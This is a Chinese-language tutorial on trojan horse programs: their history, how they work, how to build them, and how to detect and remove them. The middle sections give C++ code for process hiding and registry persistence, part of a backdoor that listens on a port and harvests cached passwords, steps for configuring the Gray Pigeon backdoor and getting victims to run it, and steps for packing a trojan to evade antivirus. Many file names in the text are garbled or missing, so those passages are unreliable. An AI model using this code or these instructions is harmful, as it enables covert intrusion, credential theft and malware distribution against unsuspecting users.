大家對“木馬”這個名詞應(yīng)該不陌生。很多人懷疑自己的“計算機系統(tǒng)慢了”、“有些文件打不開”、“打開主頁慢了”是不是自己是“病毒木馬”。其實這里要解釋“病毒”和“病毒”。

木馬和病毒的主要區(qū)別：

1、病毒是當已感染的軟件運行時，這些惡性程序向計算機軟件添加代碼,修改程序的工作方式,從而獲取計算機的控制權(quán)。

2、木馬是指未經(jīng)用戶同意進行非授權(quán)操作的一種惡意程序。它們可能刪除硬盤上的數(shù)據(jù)，使系統(tǒng)癱瘓，盜取用戶資料等。木馬程序不能獨立侵入計算機，而是要依靠黑客來進行傳播，它們常常被偽裝成"正常"軟件進行散播。

3、他們最大的區(qū)別就是病毒具有感染性，而木馬一般不具有感染性，另外，病毒入侵后立刻有感覺 ，而木馬入侵后希望你沒有感覺，這樣才有利于她"開展工作"。

好的，大家理解了木馬和病毒的區(qū)別以后，今天咱們進入正題，闡述一下"木馬程序的原理與實現(xiàn)"！

一、 木馬程序簡介

1、 木馬的由來和定義

由來：

先講個故事，故事發(fā)生在在三千多年的古希臘，特洛伊的王子帕里斯愛上了斯巴達國王的妻子——絕世美女海倫。王子把她帶回了特洛伊古城，這時斯巴達王非常的憤怒，他找到了自己的哥哥，邁錫尼國王阿加伽門農(nóng)，請求他的的幫忙，阿伽門農(nóng)正好也希望征服特洛伊，于是借此機會建立了一支希臘聯(lián)軍討伐特洛伊古城。然后事情卻沒那么簡單，建軍圍攻了特洛伊古城9年仍未攻下，到了第十年，將領(lǐng)奧德修斯想出一計，將一批勇士藏于一批巨大的木馬腹內(nèi)，放在城外，大部隊則佯裝退軍。特洛伊人以為敵軍已退，就打開城門，打掃戰(zhàn)場，并把敵軍留下的那只木馬作為戰(zhàn)利品帶進了城中。全程飲酒狂飲，到了夜間，全城軍民進入夢鄉(xiāng)，而埋伏在木馬中的勇士們跳了出來，并打開城門四處放火，城外將士一擁而入，部隊里應(yīng)外合，攻下了特洛伊城池。后代稱這只大木馬為"特洛伊木馬"。后來，人們在寫文章時，就常用"特洛伊木馬"這一典故比作在敵方營壘內(nèi)埋下伏兵里應(yīng)外合的活動。

基礎(chǔ)定義：入侵者編寫入侵他人電腦并進行控制和破壞的程序，就叫做"木馬程序"。木馬與計算機網(wǎng)絡(luò)中常常要用到的遠程控制軟件有些相似，但由于遠程控制軟件是"善意"的控制，因此通常不具有隱蔽性；"木馬"則完全相反，木馬的目的是要達到 "偷竊"性的遠程控制，如果沒有很強的隱蔽性的話，那就是"毫無價值"的。

2、木馬的主要特點

（1）偽裝性：木馬總是偽裝成其他程序來迷惑管理員。

（2）潛伏性：木馬能夠毫無聲響地打開端口等待外部連接。

（3）隱蔽性：木馬的運行隱蔽，甚至使用任務(wù)管理器都看不出來。

（4）自動運行性：當系統(tǒng)啟動時自動運行。

3、木馬被入侵者用來做什么？

（1）入侵

當基于認證和漏洞的入侵無法進行時，就需要考慮使用木馬入侵。

（2）留后門

由于木馬連接不需要系統(tǒng)認證并且隱蔽性好，為了以后還能控制遠程主機，可以種木馬以留后門。

二、 木馬的工作原理

1、基本原理

木馬是一種基于遠程控制的黑客工具，一般來說，木馬程序包括客戶端和服務(wù)端兩部分。

其中，客戶端運行在入侵者的操作系統(tǒng)上，是入侵者控制目標主機的平臺；服務(wù)端則是運行在目標主機上，是被控制的平臺，一般發(fā)送給目標主機的就是服務(wù)端文件。

木馬主要是依靠郵件附件、軟件下載、淫穢圖片、通信軟件等途徑進行傳播，然后，木馬通過一定的提示誘使目標主機運行木馬的服務(wù)端程序，實現(xiàn)木馬的種植。

例如：入侵者偽裝成目標主機用戶的朋友，發(fā)送了一張捆綁有木馬的電子賀卡，當目標主機打開賀卡后，屏幕上雖然會出現(xiàn)賀卡的畫面，但此時木馬服務(wù)端程序已經(jīng)在后臺運行了。

木馬的體積都非常小，大部分在幾KB到幾十KB之間。

當目標主機執(zhí)行了服務(wù)端程序之后，入侵者便可以通過客戶端程序與目標主機的服務(wù)端建立連接，進而控制目標主機。

對于通信協(xié)議的選擇，絕大多數(shù)木馬使用的是TCP/IP協(xié)議，但也有使用UDP協(xié)議的木馬。

木馬的服務(wù)端程序會盡可能地隱蔽行蹤，同時監(jiān)聽某個特定的端口，等待客戶端的連接；此外，服務(wù)端程序為了在每次重新啟動計算機后能正常運行，還需要通過修改注冊表等方法實現(xiàn)自啟動功能。

2、關(guān)鍵技術(shù)

(一) 隱藏技術(shù)

1) 程序隱藏

木馬程序可以利用程序捆綁的方式，將自己和正常的exe 文件進行捆綁。當雙擊運行捆綁后的程序時，正常的exe 文件運行了。程序隱藏只能達到從表面上無法識別木馬程序的目的，但是可以通過任務(wù)管理器中發(fā)現(xiàn)木馬程序的蹤跡，這就需要木馬程序?qū)崿F(xiàn)進程隱藏。

2) 進程隱藏

隱藏木馬程序的進程顯示能防止用戶通過任務(wù)管理器查看到木馬程序的進程，從而提高木馬程序的隱蔽性。主要有兩種：

API攔截屬于進程偽隱藏方式通過利用Hook技術(shù)監(jiān)控并截獲系統(tǒng)中某些程序?qū)M程顯示的API 函數(shù)調(diào)用，然后修改函數(shù)返回的進程信息，將自己從結(jié)果中刪除，導(dǎo)致任務(wù)管理器等工具無法顯示該木馬進程。

遠程線程注入屬于進程真隱藏方式 主要是利用CreateRemoteThread函數(shù)在某一個目標進程中創(chuàng)建遠程線程，共享目標進程的地址空間，并獲得目標進程的相關(guān)權(quán)限，從而修改目標進程內(nèi)部數(shù)據(jù)和啟動DLL 木馬。

3) 通信隱藏

可以從通信連接的狀況中發(fā)現(xiàn)木馬程序的蹤跡。因此，很有必要實現(xiàn)木馬程序的通信隱藏。主要有兩種方式：

端口復(fù)用技術(shù)，它讓木馬服務(wù)端程序共享其他網(wǎng)絡(luò)程序已打開的端口和客戶端進行連接，從而防止重新開啟端口降低隱蔽性。關(guān)鍵之處在于，木馬程序應(yīng)增設(shè)一個數(shù)據(jù)包轉(zhuǎn)交判斷模塊，該模塊控制主機對數(shù)據(jù)報的轉(zhuǎn)交選擇。

利用ICMP和HTTP 協(xié)議，通常網(wǎng)絡(luò)防火墻和入侵檢測系統(tǒng)等安全設(shè)備只檢查ICMP報文的首部，對數(shù)據(jù)部分不做處理。因此，可以將木馬程序的通信數(shù)據(jù)隱藏在ICMP 報文格式的選項數(shù)據(jù)字段進行傳送，如把服務(wù)端程序向客戶端程序傳輸?shù)臄?shù)據(jù)偽裝成回顯請求報文，而把客戶端程序向服務(wù)端程序傳輸?shù)臄?shù)據(jù)偽裝成回顯應(yīng)答報文。這樣，就可以通過PING\PINGRESPONSE的方式在木馬服務(wù)端程序和客戶端程序之間建立起一個高效的秘密會話信道。利用ICMP 協(xié)議傳輸數(shù)據(jù)還有一個很大的優(yōu)點，即ICMP 屬于IP 層協(xié)議，它在傳輸數(shù)據(jù)時并不使用任何端口，從而具有更好的隱蔽性。

(二) 木馬自啟動技術(shù)

自啟動功能是必不可少的。自啟動可以保證木馬不會因為用戶的一次關(guān)機操作而徹底失去作用。下面介紹經(jīng)常使用的幾種方法。

1）在Win.ini中啟動

在Win.ini文件中的[Windows]字段中有啟動命令"load="和"run="。默認情況下，"="后面是空白的。這兩項分別是用來當系統(tǒng)啟動時自動加載和運行的程序，如果木馬程序加載到這兩項中，那么系統(tǒng)啟動后即可自動地加載和運行。

2）在Sy中啟動

在Sy文件中的[boot]字段的shell=Ex中是木馬常用的隱藏加載的地方。木馬最慣用的伎倆就是把本應(yīng)是"Ex"變成自己的程序名，名稱偽裝成幾乎與Ex一樣，只需稍稍改"Explorer"的字母"l"改為數(shù)字"1"，或者把其中的"o"改為數(shù)字"0"，這些改變?nèi)绻蛔屑毩粢馐呛茈y被人發(fā)現(xiàn)的?；蛘呤莝hell=Ex 的后面加上木馬程序的路徑，如：shell=Ex ，這里的就是木馬服務(wù)端程序。

3）通過啟動組實現(xiàn)自啟動

啟動組是專門用來實現(xiàn)應(yīng)用程序自啟動的地方。啟動組文件夾的位置為"C:\Documents and Settings\All Users\「開始」菜單\程序\啟動"。

[注："All Users"即對所有用戶都有作用]

4）通過注冊表啟動

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run，

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce，

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

5）修改文件關(guān)聯(lián)

修改文件關(guān)聯(lián)是木馬常用手段。

例如：在正常情況下，txt文件的打開方式為no文件，但一旦中了文件關(guān)聯(lián)木馬，則txt文件打開方式就會被修改為用木馬程序打開。例如著名的國產(chǎn)木馬冰河就是這樣。

6）捆綁文件

入侵者可以通過一些黑客軟件，如著名的Deception Binder，完成文件的捆綁，之后將這些捆綁文件放到網(wǎng)站、FTP、BT等資源下載場所，當用戶下載并執(zhí)行捆綁文件，同時就啟動了木馬的服務(wù)端程序。

(三) 木馬植入技術(shù)

1）圖標偽裝

黑客為了迷惑用戶，將木馬服務(wù)端程序的圖標換成一些常見的文件類型的圖標。

2）文件捆綁欺騙

文件捆綁就是通過使用文件捆綁器將木馬服務(wù)端和正常的文件捆綁在一起，達到欺騙對方從而運行捆綁的木馬程序的目的。

例如，把木馬服務(wù)端和某個游戲，或者flash文件捆綁成一個文件通過QQ或郵件發(fā)送給受害者。當受害者對這個游戲或flash感興趣而下載到機器上，并開打了該文件，木馬程序就會悄悄運行。

3）定制端口

很多老式的木馬端口都是固定的，只要查一下特定的端口就知道感染了什么木馬?，F(xiàn)在很多新式的木馬都加入了定制端口的功能，控制端用戶可以在1024～65535之間任選一個端口作為木馬端口，一般不選1024以下的端口，這就給判斷所感染的木馬類型帶來了麻煩。

4）擴展名欺騙

例如，圖像文件的擴展名不可能是.exe，而木馬程序的擴展名又必定是.exe，大多數(shù)用戶在看到擴展名為".exe"的文件時，就會很小心。于是設(shè)計者就將文件名進行一些改變，例如將";更改為";，因為windows默認是不顯示擴展名的，于是用戶就只能看到";，很容易將其作為一個圖片文件而啟動。

三、 木馬的演變與種類

1、木馬的演變

從木馬的發(fā)展來看，把木馬分為五代。

1）第一代木馬

第一代的木馬功能相當簡單，典型的有back orifice（簡稱：BO）、netSpy等，早就退出了歷史的舞臺。

第一代windows木馬只是一個將自己偽裝成特殊的程序或文件的軟件，如偽裝成一個用戶登錄窗口，當用戶運行了木馬偽裝的登錄窗口，輸入用戶名和密碼后，木馬將自動記錄數(shù)據(jù)并轉(zhuǎn)發(fā)給入侵者。

2）第二代木馬

提供了幾乎所有能夠進行的遠程控制操作。國內(nèi)最具代表性的就是冰河木馬和廣外女生。

3）第三代木馬

繼續(xù)完善了連接與文件傳輸技術(shù)，并增加了木馬穿透防火墻的功能，并出現(xiàn)了"反彈端口"技術(shù)，如國內(nèi)的灰鴿子木馬軟件。

4）第四代木馬

利用了遠程線程插入技術(shù)，將木馬線程插入DLL線程中，使系統(tǒng)更加難以發(fā)現(xiàn)木馬的存在與入侵的連接方式。

5）第五代木馬

相對于第四代木馬，功能更加全面。而且應(yīng)用DLL技術(shù)后在目標主機的計算機中不生成新的文件。

2、木馬的種類

1）破壞型

破壞并刪除文件，自動刪除電腦上的dll、EXE等文件，以達到使被感染的電腦癱瘓的目的。

2）密碼發(fā)送型

密碼發(fā)送型的木馬正是專門為了盜取被感染計算機上的密碼而編寫的，該木馬一旦被執(zhí)行，就會自動搜索內(nèi)存，Cache，臨時文件夾以及各種敏感密碼文件，一旦搜索到有用的密碼，木馬就會利用免費的電子郵件服務(wù)將密碼發(fā)送到指定的郵箱。從而達到獲取密碼的目的，所以這類木馬大多使用25號端口發(fā)送E-mail。

3）遠程訪問型

遠程訪問型木馬程序一般包括客戶端程序和服務(wù)端程序，在目標主機上執(zhí)行了服務(wù)端程序之后，只要用戶知道目標主機的IP地址或主機名，就可以與目標主機連接，連接成功后，用戶通過客戶端程序提供的遠程操作功能就可以實現(xiàn)對目標主機的監(jiān)視與控制。

大名鼎鼎的木馬冰河就是一個遠程訪問型特洛伊木馬。

4）鍵盤記錄木馬

記錄目標主機用戶的鍵盤操作且將鍵盤操作記錄在文件中，入侵者可以獲取這些文件并在文件中獲取諸如密碼等有用的信息。

對于這種類型的木馬，郵件發(fā)送功能也是必不可少的。

5）Dos攻擊木馬

Dos全名是Denial of service（拒絕服務(wù)）。它故意攻擊網(wǎng)絡(luò)協(xié)議的缺陷或直接通過某種手段耗盡被攻擊對象的資源，目的是讓目標計算機或網(wǎng)絡(luò)無法提供正常的服務(wù)或資源訪問，使目標系統(tǒng)服務(wù)停止響應(yīng)甚至崩潰。

當黑客侵入一臺計算機并種上了DOS攻擊木馬后，日后這臺計算機就成了黑客DOS攻擊的最得力的幫手。黑客控制的計算機數(shù)量越多，發(fā)動DOS攻擊取得成功的概率就越大，所以，這種木馬的危害不是體現(xiàn)在被感染的計算機上，而是體現(xiàn)在攻擊者可以利用它來攻擊網(wǎng)絡(luò)上的其他的計算機。

全名是 ()，很多攻擊源一起攻擊某臺服務(wù)器就組成了DDOS攻擊。

6）代理木馬

給被控制的肉雞種上代理木馬，讓其變成入侵者發(fā)動攻擊的跳板就是代理木馬最重要的任務(wù)。通過代理木馬，入侵者可以在匿名的情況下使用Telnet等程序，從而隱蔽自己的蹤跡。

7）FTP木馬

這種木馬可能是最簡單和古老的木馬了，它的惟一功能就是打開21端口，等待用戶連接?，F(xiàn)在新FTP木馬還加上了密碼功能，這樣，只有攻擊者本人才知道正確的密碼，從而進入對方的計算機。

8）程序殺手木馬

常見的查殺木馬軟件有瑞星，Norton Anti-Virus及木馬清除大師等。程序殺手木馬的功能就是關(guān)閉目標機器上運行的木馬查殺程序，讓木馬更好地發(fā)揮作用。

9）反彈端口型木馬

木馬開發(fā)者在分析了防火墻的特性后發(fā)現(xiàn) ：防火墻對于連入的鏈接往往會進行非常嚴格的過濾，但是對于連出的鏈接卻疏于防范。

于是，與一般的木馬相反，反彈端口型木馬在服務(wù)端 (被控制端)使用主動端口，客戶端 (控制端)使用被動端口。

木馬定時監(jiān)測客戶端（控制端）的存在，發(fā)現(xiàn)客戶端（控制端）上線立即主動連接控制端打開的主動端口；

為了隱蔽起見，客戶端 (控制端)的被動端口一般設(shè)置為80（瀏覽網(wǎng)頁必須開的端口），這樣，即使用戶使用端口掃描軟件檢查自己的端口，發(fā)現(xiàn)的也是類似TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情況，不明真相的用戶就會以為自己在瀏覽網(wǎng)頁，并且，防火墻一般不會禁止用戶向外連接80端口。

主流木馬：

四、 木馬程序的實現(xiàn)

1、 木馬中的關(guān)鍵技術(shù)實現(xiàn)（附源碼）

1) 木馬程序隱藏技術(shù)

通過注冊服務(wù)程序，實現(xiàn)進程偽隱藏的方法：

WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) { try { DWORD dwVersion = GetVersion();//取得Windows的版本號 if (dwVersion >= 0x80000000) // Windows 9x隱藏任務(wù)列表 { int (CALLBACK *rsp)(DWORD,DWORD); HINSTANCE dll=LoadLibrary("KERNEL32.DLL");//裝入KERNEL32.DLL rsp=(int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口 rsp(NULL,1);//注冊服務(wù) FreeLibrary(dll);//釋放DLL模塊 } } catch (Exception &exception)//處理異常事件 { //處理異常事件 } return 0; }　

2) 程序的自啟動運行技術(shù)

展示一段通過修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersions/Run鍵值來實現(xiàn)自啟動的程序：

HKEY hkey; AnsiString NewProgramName=AnsiString(sys)+AnsiString("+PName/">//")+PName unsigned long k; k=REG_OPENED_EXISTING_KEY; RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN//", 0L, NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_VALUE, NULL, &hkey,&k); RegSetValueEx(hkey, "BackGroup", 0, REG_SZ, NewProgramName.c_str(), NewProgramName.Length()); RegCloseKey(hkey); if (int(ShellExecute(Handle, "open", NewProgramName.c_str(), NULL, NULL, SW_HIDE))>32) { WantClose=true; Close(); } else { HKEY hkey; unsigned long k; k=REG_OPENED_EXISTING_KEY; long a=RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE,NULL, &hkey,&k); RegSetValueEx(hkey, "BackGroup", 0, REG_SZ, ProgramName.c_str(), ProgramName.Length()); int num=0; char str[20]; DWORD lth=20; DWORD type; char strv[255]; DWORD vl=254; DWORD Suc; do{ Suc=RegEnumValue(HKEY_LOCAL_MACHINE, (DWORD)num,str, NULL, &type, strv,&vl); if (strcmp(str,"BGroup")==0) { DeleteFile(AnsiString(strv)); RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup"); break; } }while(Suc== ERROR_SUCCESS); RegCloseKey(hkey); }

2、 WINSOCK編程完成一個簡單"木馬程序"實現(xiàn)（附源碼）

用異步SOCKET方式, 直接調(diào)用WINSOCK API,WIN SDK寫的木馬(VC,C++ BUILDER下均編譯,調(diào)試通過),無須客戶端,編譯后才幾十K.實現(xiàn)了些 主要功能,文件瀏覽,上傳,下載(均支持統(tǒng)配符),改變目錄,獲取系統(tǒng)信息,從CACHE取密碼, 執(zhí)行文件,顯示進程, 發(fā)送消息,關(guān)機, 還有些控制功能。

源代碼如下：

#include <windows.h> #include <win; #include <mm; #pragma hdrstop #include <conde; #pragma argsused #define RUN "; //注冊服務(wù) #define SERVICE_PROC 1 //卸載服務(wù) #define UNSERVICE_PROC 0 #define TH32CS_SNAPPROCESS 0x00000002 #define PROCESS_HANDLE_NAME 255 //緩沖區(qū)長度 #define dwBuffSize 2048 //命令行長度 #define dwComm 50 #define PORT 9102 #define WM_SOCKET WM_USER+1 #define PROMPT "LanLan://>" DWORD dwVersion=MAKEWORD(1,1); DWORD dwFlag=TRUE; WSADATA wsaData; SOCKET CreateSock,NewSock; SOCKADDR_IN Sock_in,NewSock_in; LPTSTR szReadBuff,Ob,TempBuff; int addrlen; //CACHE PASSWORD結(jié)構(gòu) typedef struct tagPASSWORD_CACHE_ENTRY { WORD cbEntry; WORD cbResource; WORD cbPassword; BYTE iEntry; BYTE nType; char abResource[1]; } PASSWORD_CACHE_ENTRY; typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD); //CACHE PASSWORD函數(shù)原形 typedef WORD (WINAPI *PWNetEnumCachedPasswords)( LPSTR pbPrefix, DWORD cbPrefix, DWORD nType, CACHECALLBACK pfnCallback, DWORD UNKNOWN ); //TOOLHELP32 結(jié)構(gòu) typedef struct tagPROCESSENTRY32 { DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; DWORD th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; TCHAR szExeFile[MAX_PATH]; } PROCESSENTRY32; typedef PROCESSENTRY32 * LPPROCESSENTRY32; 注：由于文章篇幅限制剩余源碼可以私信我單獨發(fā)送

3、 利用"灰鴿子"工具軟件制作木馬

灰鴿子簡介： 灰鴿子是國內(nèi)一款著名后門。比起前輩冰河、黑洞來，灰鴿子可以說是國內(nèi)后門的集大成者。其豐富而強大的功能、靈活多變的操作、良好的隱藏性使其他后門都相形見絀。客戶端簡易便捷的操作使剛?cè)腴T的初學(xué)者都能充當黑客。當使用在合法情況下時，灰鴿子是一款優(yōu)秀的遠程控制軟件。但如果拿它做一些非法的事，灰鴿子就成了很強大的黑客工具。

方法如下：

首先，在電腦上安裝灰鴿子，然后進入其主頁面

接下來我們點自動上線FTP服務(wù)器就是你FTP空間的地址

下來點配置服務(wù)程序，先點自動上線設(shè)置，IP通知那里添上你FTP在HTTP的訪問地址加上你放IP文件的地址

最終我們要把服務(wù)器配置成功

這時你只要將自己生成的木馬給別人運行就可以了，這樣他就會上線如下圖

如果設(shè)了密碼就要輸入連接密碼哦

五、 如何給易被查殺的木馬"加殼"

大家知道現(xiàn)在的病毒查殺軟件對已知的木馬程序很容易就查殺掉，所以當你好不容易制作的木馬傳播出去后，輕松就被客戶端查殺掉了，這時我們就要利用加殼技術(shù)，給木馬套個"殼"防止被殺

1、什么是加殼？

加殼：是一種通過一系列數(shù)學(xué)運算，將可執(zhí)行程序文件（EXE）或動態(tài)鏈接庫文件（DLL）的編碼進行改變（目前加殼軟件還可以壓縮、加密），以達到縮小文件體積或加密程序編碼的目的。當被加殼的程序運行時，外殼程序先被執(zhí)行，然后由這個外殼程序負責將用戶原有的程序在內(nèi)存中解壓縮，并把控制權(quán)交還給脫殼后的真正程序。

常見到的壓縮殼有"UPX"、"北斗程序壓縮"、"ASPack"等，加密殼有"PE-Armor"、"ASProtect"等等。

2、利用ASPack加殼防止木馬被查殺：

步驟1：下載并運行ASPack2.28軟件，即可打開ASPack 2.28主窗口，如圖1-69所示。在"選項"選項卡中勾選"壓縮資源"、"加載后立即運行"及"使用Windows DLL 加載器"等復(fù)選項，如下圖所示：

步驟2：選擇"打開文件"選項卡，單擊"打開"按鈕，即可打開"選擇要壓縮的文件"對話框，在其中選擇需要加殼的文件，如下圖所示。

步驟3：單擊"打開"按鈕，即可開始進行壓縮，如下圖所示。在"壓縮"選項卡中可進行壓縮、測試操作，并在完成之后生成加殼后的文件。

使用方法比較簡單，可以自行測試一下效果！

六、 如何識別與查殺木馬程序

識別方法：

1、檢查網(wǎng)絡(luò)連接情況

由于不少木馬會主動偵聽端口，或者會連接特定的IP和端口，所以我們可以在沒有正常程序連接網(wǎng)絡(luò)的情況下，通過檢查網(wǎng)絡(luò)連情情況來發(fā)現(xiàn)木馬的存在。

具體的步驟是點擊"開始" "運行" "cmd"，然后輸入netstat -an這個命令能看到所有和自己電腦建立連接的IP以及自己電腦偵聽的端口，它包含四個部分——proto（連接方式）、local address（本地連接地址）、foreign address（和本地建立連接的地址）、state（當前端口狀態(tài)）。通過這個命令的詳細信息，我們就可以完全監(jiān)控電腦的網(wǎng)絡(luò)連接情況。

　2、查看目前運行的服務(wù)

服務(wù)是很多木馬用來保持自己在系統(tǒng)中永遠能處于運行狀態(tài)的方法之一。我們可以通過點擊"開始" "運行" "cmd"，然后輸入"net start"來查看系統(tǒng)中究竟有什么服務(wù)在開啟，如果發(fā)現(xiàn)了不是自己開放的服務(wù)，我們可以進入"服務(wù)"管理工具中的"服務(wù)"，找到相應(yīng)的服務(wù)，停止并禁用它。

　3、檢查系統(tǒng)啟動項

由于注冊表對于普通用戶來說比較復(fù)雜，木馬常常喜歡隱藏在這里。檢查注冊表啟動項的方法如下：點擊"開始" "運行" "regedit"，然后檢查HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下所有以"run"開頭的鍵值；HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下所有以"run"開頭的鍵值；HKEY-USERS\.Default\Software\Microsoft\Windows\CurrentVersion下所有以"run"開頭的鍵值。

Windows安裝目錄下的Sy也是木馬喜歡隱蔽的地方。打開這個文件看看，在該文件的[boot]字段中，是不是有shell=Ex 這樣的內(nèi)容，如有這樣的內(nèi)容，那這里的就是木馬程序了！

　4、檢查系統(tǒng)帳戶

惡意的攻擊者喜在電腦中留有一個賬戶的方法來控制你的計算機。他們采用的方法就是激活一個系統(tǒng)中的默認賬戶，但這個賬戶卻很少用的，然后把這個賬戶的權(quán)限提升為管理員權(quán)限，這個帳戶將是系統(tǒng)中最大的安全隱患。惡意的攻擊者可以通過這個賬戶任意地控制你的計算機。針對這種情況，可以用以下方法對賬戶進行檢測。

點擊"開始";"運行" "cmd"，然后在命令行下輸入net user，查看計算機上有些什么用戶，然后再使用"net user 用戶名"查看這個用戶是屬于什么權(quán)限的，一般除了Administrator是administrators組的，其他都不應(yīng)該屬于administrators組，如果你發(fā)現(xiàn)一個系統(tǒng)內(nèi)置的用戶是屬于administrators組的，那幾乎可以肯定你被入侵了?？焓褂?#34;net user用戶名/del"來刪掉這個用戶吧！

5、利用系統(tǒng)進程識別木馬

任何病毒和木馬存在于系統(tǒng)中，都無法徹底和進程脫離關(guān)系，即使采用了隱藏技術(shù)，也還是能夠從進程中找到蛛絲馬跡，因此，查看系統(tǒng)中活動的進程成為我們檢測病毒木馬最直接的方法。

木馬常利用的系統(tǒng)進程有：、ex、iex、winLOGOn.exe等進程。

（1）

常被病毒冒充的進程名有：、、。隨著Windows系統(tǒng)服務(wù)不斷增多，為了節(jié)省系統(tǒng)資源，微軟把很多服務(wù)做成共享方式，交由進程來啟動。而系統(tǒng)服務(wù)是以動態(tài)鏈接庫(DLL)形式實現(xiàn)的，它們把可執(zhí)行程序指向scvhost，由cvhost調(diào)用相應(yīng)服務(wù)的動態(tài)鏈接庫來啟動服務(wù)。

我們可以打開"控制面板"→"治理工具"→服務(wù)，雙擊其中"ClipBook"服務(wù)，在其屬性面板中可以發(fā)現(xiàn)對應(yīng)的可執(zhí)行文件路徑為"C:\WINDOWS\system32\cli;。再雙擊"Alerter"服務(wù)，可以發(fā)現(xiàn)其可執(zhí)行文件路徑為"C:\WINDOWS\system32\ -k LocalService"，而"Server"服務(wù)的可執(zhí)行文件路徑為"C:\WINDOWS\system32\ -k netsvcs"。正是通過這種調(diào)用，可以省下不少系統(tǒng)資源，因此系統(tǒng)中出現(xiàn)多個，其實只是系統(tǒng)的服務(wù)而已。

在Windows系統(tǒng)中一般存在2個進程，一個是RPCSS(RemoteProcedureCall)服務(wù)進程，另外一個則是由很多服務(wù)共享的一個;而在WindowsXP中，則一般有4個以上的服務(wù)進程。假如進程的數(shù)量多于5個，就要小心了，很可能是病毒假冒的，檢測方法也很簡單，使用一些進程治理工具，例如Windows優(yōu)化大師的進程治理功能，查看的可執(zhí)行文件路徑，假如在"C:\WINDOWS\system32"目錄外，那么就可以判定是病毒了。

（2）ex

常被病毒冒充的進程名有：iex、ex、ex。ex就是我們經(jīng)常會用到的"資源治理器"。假如在"任務(wù)治理器"中將ex進程結(jié)束，那么包括任務(wù)欄、桌面、以及打開的文件都會統(tǒng)統(tǒng)消失，單擊"任務(wù)治理器"→"文件"→"新建任務(wù)"，輸入"ex"后，消失的東西又重新回來了。ex進程的作用就是讓我們治理計算機中的資源。

ex進程默認是和系統(tǒng)一起啟動的，其對應(yīng)可執(zhí)行文件的路徑為"C:\Windows"目錄，除此之外則為病毒。

（3）iex

常被病毒冒充的進程名有：iex、iexploer.exeiex進程和上文中的ex進程名很相像，因此比較輕易搞混，其實iex是Microsoft Internet Explorer所產(chǎn)生的進程，也就是我們平時使用的IE瀏覽器。知道作用后辨認起來應(yīng)該就比較輕易了，iex進程名的開頭為"ie"，就是IE瀏覽器的意思。

iex進程對應(yīng)的可執(zhí)行程序位于C:\ProgramFiles\InternetExplorer目錄中，存在于其他目錄則為病毒，除非你將該文件夾進行了轉(zhuǎn)移。此外，有時我們會發(fā)現(xiàn)沒有打開IE瀏覽器的情況下，系統(tǒng)中仍然存在iex進程，這要分兩種情況：

1) 病毒假冒iex進程名。

2) 病毒偷偷在后臺通過iex干壞事。

（4）rundll32.exe

常被病毒冒充的進程名有：rundl132.exe、rundl32.exe。rundll32.exe在系統(tǒng)中的作用是執(zhí)行DLL文件中的內(nèi)部函數(shù)，系統(tǒng)中存在多少個Rundll32.exe進程，就表示Rundll32.exe啟動了多少個的DLL文件。其實rundll32.exe我們是會經(jīng)常用到的，他可以控制系統(tǒng)中的一些dll文件，舉個例子，在"命令提示符"中輸入"rundll32.exe u;，回車后，系統(tǒng)就會快速切換到登錄界面了。rundll32.exe的路徑為"C:\Windows\system32"，在別的目錄則可以判定是病毒。

（5）

常被病毒冒充的進程名有：、。是系統(tǒng)服務(wù)"Print Spooler"所對應(yīng)的可執(zhí)行程序，其作用是治理所有本地和網(wǎng)絡(luò)打印隊列及控制所有打印工作。假如此服務(wù)被停用，計算機上的打印將不可用，同時進程也會從計算機上消失。假如你不存在打印機設(shè)備，那么就把這項服務(wù)關(guān)閉吧，可以節(jié)省系統(tǒng)資源。停止并關(guān)閉服務(wù)后，假如系統(tǒng)中還存在進程，這就一定是病毒偽裝的了。

查殺方法：

手工查殺：

1、運行任務(wù)管理器，殺掉木馬進程。

2、檢查注冊表中RUN、RUNSERVEICE等幾項，先備份，記下可以啟動項的地址， 再將可疑的刪除。

3、刪除上述可疑鍵在硬盤中的執(zhí)行文件。

4、一般這種文件都在WINNT，SYSTEM，SYSTEM32這樣的文件夾下，他們一般不會單獨存在，很可能是有某個母文件復(fù)制過來的，檢查C、D、E等盤下有沒有可疑的.exe，.com或.bat文件，有則刪除之。

5、檢查注冊表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main中的幾項（如Local Page），如果被修改了，改回來就可以。

6、檢查HKEY_CLASSES_ROOT\txtfile\shell\open\command和 HKEY_CLASSES_ROOTxtfileshellopencommand等等幾個常用文件類型的默認打開程序是否被更改。這個一定要改回來。很多病毒就是通過修改.txt文件的默認打開程序讓病毒在用戶打開文本文件時加載的。

利用工具查殺：

查殺木馬好用的工具有LockDown、The Clean、木馬克星、金山木馬專殺、木馬清除大師、木馬分析專家等，利用這些工具絕大多數(shù)的已知木馬都可以查殺掉。